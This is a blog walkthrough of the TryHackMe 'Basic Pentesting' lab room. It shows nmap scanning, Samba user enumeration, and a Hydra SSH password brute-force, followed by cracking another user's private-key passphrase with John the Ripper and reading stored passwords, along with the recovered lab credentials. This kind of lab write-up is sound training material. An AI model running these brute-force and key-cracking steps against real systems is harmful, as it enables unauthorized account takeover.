How to Warm Up my HACKING skills with TryHackMe

How to Warm Up my HACKING skills with TryHackMe

TryHackMe is an online platform for learning and teaching cyber security. It is based on completing rooms and upskill in security, all from your browser. This is my writeup for the Basic pentesting room.

4 min read

I have the feeling that the core of the last few articles is related to pentesting and hacking. But after discussing about integration patterns, coding and best practices all day long in my job I fond myself enjoying the hacking challenges in my spare time.

TryHackMe is an online platform for learning and teaching cyber security. It is based on completing rooms and upskill in security, all from your browser.

This article is a Writeups for the Basic Pentesting room.

1️. Deploy the machine and connect to our network

2️. Find the services exposed by the machine

$ nmap -sC -sV <IP>
# Nmap 7.80 scan initiated Sun Mar 22 11:26:39 2020 as: nmap -sC -sV -oN output/nmap 10.10.38.196
Nmap scan report for 10.10.38.196
Host is up (0.077s latency).
Not shown: 997 closed ports
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 db:45:cb:be:4a:8b:71:f8:e9:31:42:ae:ff:f8:45:e4 (RSA)
|   256 09:b9:b9:1c:e0:bf:0e:1c:6f:7f:fe:8e:5f:20:1b:ce (ECDSA)
|_  256 a5:68:2b:22:5f:98:4a:62:21:3d:a2:e2:c5:a9:f7:c2 (ED25519)
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
Service Info: Host: BASIC2; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 1h19m59s, deviation: 2h18m34s, median: -1s
|_nbstat: NetBIOS name: BASIC2, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|   Computer name: basic2
|   NetBIOS computer name: BASIC2\x00
|   Domain name: \x00
|   FQDN: basic2
|_  System time: 2020-03-22T06:26:54-04:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2020-03-22T10:26:54
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Mar 22 11:26:58 2020 -- 1 IP address (1 host up) scanned in 19.80 seconds

We  have 3 Open PORTS:

  • 22 (SSH)
  • 139 and 445 (smbd)

If we open this IP in the browser we see a server sunning.

3. What is the name of the hidden directory on the web server(enter name without /)?

<!-- Check our dev note section if you need to know what to worck on. -->

We could use gobuster to search for directories with brute-force but since we have a hint here let's try it first... ok /dev isn't the directory we are looking for but we see an apache server running. Maybe /development is the right endpoint... Yes, we nailed it.

4. User brute-forcing to find the username & password

5. What is the username?

We have smbd open, that can give us a lot of information. We can use Enum4linux for that. Since I don't have the tool installed on my machine and handling all the dependencies may be a nightmare let's use docker.

$ docker run --rm -it enum4linux -a <IP>

2 users pop up, jan a.k.a. J and kay a.k.a. K.

6. What is the password? + 7. What service do you use to access the server(answer in abbreviation in all caps)?

Seen the input field we can assume the password is pretty simple, a brute force approach should unlock it.

We have the information about the open ports thanks the nmap tool. SSH is a great candidate with a tool called Hydra. A common password dictionary is needed tho and we are going to use rockyou.txt

Rockyou.txt contains 14,341,564 unique passwords, used in 32,603,388 accounts.

Kali Linux provides this dictionary file as part of its standard installation.

$ hydra -l jan -P rockyou.txt ssh:<ip>

login: jan   password: armando

8. Enumerate the machine to find any vectors for privilege escalation

9. What is the name of the other user you found(all lower case)?

We already have this information from point 5.

10. If you have found another user, what can you do with this information? + 11. What is the final password you obtain?

Awesome, now we can login with SSH as jan . Listing the file in jan directory doesn’t give us any answer to escalating the privilege. Still, remember we have the user kay? Let’s find it out.

We found the id_rsa and id_rsa.pub and a strange file pass.back, unfortunately when we try to ssh using the key file we see the key requires a passphrase.

$ ssh -i id_rsa kay@<IP>

Enter passphrase for key 'id_rsa':

But luckily we can cat out this file and crack the key with JohnTheRipper

$ ssh2john.py output/kay/id_rsa > id_rsa.txt

$ docker run -it --rm -v $(pwd)/id_rsa.txt:/opt/id_rsa.txt -v $(pwd)/dic/rockyou.txt:/opt/rockyou.txt obscuritylabs/johntheripper /opt/id_rsa.txt --wordlist=/opt/rockyou.txt
...
beeswax   (output/kay/id_rsa)

Now we can login as kay with the public key and cat the strange file we saw under the home directory for this user.

$ ssh -i id_rsa kay@<IP>

$ cat pass.back

heresareallystrongpasswordthatfollowsthepasswordpolicy$$
The stream is in Spanish

My TOOLSET
Previous article

My TOOLSET

Recently a follower asked me why do I use this thumbnails... Well it is easier than you might think. I have a crush on photography and story telling. The thumbnails allow me to create context, every single article is been born in a specific location and I want to share with y'all that moment.


Related Articles

Traveling with a HACKER Vol.2
3 min read
Traveling with a HACKER Vol.1
3 min read

GO TOP

🎉 You've successfully subscribed to jorgechato!
OK